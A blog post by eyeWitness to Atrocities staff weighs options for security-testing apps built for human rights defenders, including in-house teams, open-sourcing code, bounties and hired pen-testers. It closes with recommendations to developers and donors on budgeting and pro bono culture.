Making public interest technology safer for human rights defenders

Wendy Betts
Raquel Vazquez Llorente

Options for testing the security of an app’s code

Wendy Betts is the Director of eyeWitness to Atrocities, an organisation set up by the International Bar Association that combines legal and technological expertise to aid investigations and promote accountability for international crimes. Raquel Vazquez Llorente is the Senior Legal Advisor of eyeWitness.

Attacks against human rights defenders have been on the rise in recent years, in both the physical and digital domains. While no device or account is unhackable, good cyber security practices, like the tactics proposed in the Digital First Aid Kit or Surveillance Self Defense, can at least make penetrating a system more resource-intensive. However, even strong cyber security hygiene will be less effective, or even hopeless, if the tools used by human rights defenders have vulnerabilities in the code that can be weaponised.

This blog post offers some options to organisations creating public interest technology that want to ensure the software they develop undergoes a rigorous security audit. We explain the advantages and disadvantages each approach brings and highlight some of the limitations faced by organizations with small budgets or teams. We conclude with recommendations to donors and developers to push for stronger and more accessible security practices when building tools for civil society.

A note to human rights defenders using apps

Regardless of the option chosen by the organisation behind the tool, it is also key that users of public interest technology understand each of the approaches we outline below. Above all, users should appreciate the strengths and weaknesses of each alternative to determine what fits their risk profile.

This post does not cover cyber security practices that app users and their organisations should consider. Organisations should think about their security in a broad sense, ensuring that team members have basic security skills, shared infrastructure is scrutinised, and resources are dedicated to security. For groups who need support thinking through these kinds of challenges, The Engine Room’s light-touch support might be a good resource.

In-house testing

All systems have vulnerabilities, but many of them may not be obvious. Some vulnerabilities may open the system up to receiving a lot of damage, even if from the user’s perspective the app works without a hitch. Commercial companies often have their own internal cyber security teams whose job is to find flaws in the code and patch them before a hacker can exploit them.

Establishing an internal unit gives direct control to the developers, but assembling the right team is resource-intensive and costly. As such, in-house testing is not often feasible for smaller or less well-resourced organisations developing public interest technology. An alternative option is to outsource these services, for instance by opening the code or contracting expertise.

Opening your code to the public

An organisation may opt to open the code to the public for analysis. This can be done, for example, by uploading it to GitHub and sharing it for review. This is the most affordable option and can be a good way of obtaining external opinions. When the source code is open, anyone can inspect it and search for vulnerabilities—such as a backdoor that may be sending private information to a third party. If someone identifies a vulnerability, it can help other NGOs in the human rights community, who normally do not have the capacity or resources to conduct such analysis, before they start using the software.

However, both the app developers and users will still have to assess the skills of the individual who audited the code and will hold no control over the thoroughness, quality or frequency of the testing—or whether the code is tested at all. Most of the apps created for human rights defenders and other small communities are niche and their use is restricted to a few thousand users. Organisations can increase the chance of having their code successfully tested by reaching out to supporters, peers and open source communities. Still, this option may not attract the attention of cyber security experts, who tend to evaluate software or apps that have a wider reach.

Bounty-type programs might incentivise cyber security experts from other communities to audit the code. The “bounty” (or reward for reviewing the code) can be a token of appreciation, like a t-shirt or public recognition. However, the success of this will depend on the reputation of an organisation or its tool. It can be hard to attract skilful testing and reporting, particularly if there is not a monetary reward.

Hiring external expertise

Alternatively, organisations can turn to a specialised company for a review or audit of the code. For organisations developing apps, hiring penetration testers (also called pen-testers or ethical hackers) is an effective way of testing the strength of the code. A pen-test purposefully attacks a computer system, network, or application to reveal vulnerabilities that could lead to a security breach or disclosure of sensitive data. Generally, the results are captured in a report with insights that can improve the security of the system evaluated.

Contracting a company with a solid reputation can ensure thorough and as frequent as needed audits. Organisations should bear in mind that the fees can be high. Unlike other sectors, like the legal profession, IT security has not yet developed a culture of pro bono work. Even with a NGO discount, ethical hacking services can cost a few thousand US dollars for a consult, so it’s important to do thorough due diligence before contracting an external company. This can include checking the certifications the company holds, talking to previous customers and querying about their internal security (since they will store highly sensitive data detailing the organisation’s vulnerabilities). Additionally, it is important to ask questions about the types of pen-testing the company conducts and how they will transmit the results, and whether they offer support for implementing any corrective actions needed.

When contracting external expertise, organisations may consider publishing the findings. Before doing so, it’s important to check the terms of the contract, as some companies may not allow publication of the full report. While putting out the document, or part of it, can be beneficial to users, security audit reports can be quite technical and difficult to understand. In practice, users may end up relying on your organisation’s word about the soundness of the code or the pen-tester’s reputation.

As we’ve discussed above, many routes for accessing a security audit can be beyond the reach of small and/or under-resourced organisations. Addressing these limitations is the responsibility not just of the organisations themselves, but others within the ecosystem, too. Below are some recommendations to make security testing more widely accessible. 

Recommendations for civil society organisations developing public interest technology, in particular tools for human rights defenders and other communities at risk

  1. Add security costs to budget planning: Where possible, in funding proposals, include sufficient budget to maintain the security of tech tools over time, whether that’s adding budget for an-in house team or for hiring external expertise such as pen-testers.
  2. Contribute to culture-building: Advocate for a stronger cybersecurity pro bono culture to make the existing options more accessible to organisations that may not otherwise have access to that expertise.
  3. Develop a community of practice: Push for creative solutions, for instance by helping set up working groups or partnerships with cyber security experts, academia or the private sector that can help evaluate the security of tools.

Recommendations to donors funding public interest technology

The responsibility for building secure non-profit tools does not lie only with NGOs and civil society, but also with funders. To contribute to stronger tools, funders can:

  1. Make space for conversations with grantees about security and testing: Urge organisations to understand what cyber security testing options are available to them before they start developing a tool.
  2. Encourage and approve flexible and sustainable budgets: Allow budgets that can flexibly and realistically maintain the security of tech tools, both upon their creation and over time. Flexible funding gives grantees the opportunity to exercise control.
  3. Contribute to culture-building: Foster a stronger cyber security pro bono culture, or emphasise the role of cyber security experts who can audit code in public interest tech.
  4. Back creative solutions: Recognise the work that grantees are doing in generating momentum around security and play a facilitating role where possible. For example, consider setting up expert working groups that can offer guidance on the cyber audit options that are available to smaller organisations; or spearhead cyber security partnerships between non-profits developing software, academia and the private sector to help evaluate the security of tools.

Photo by Jon Moore on Unsplash

MORE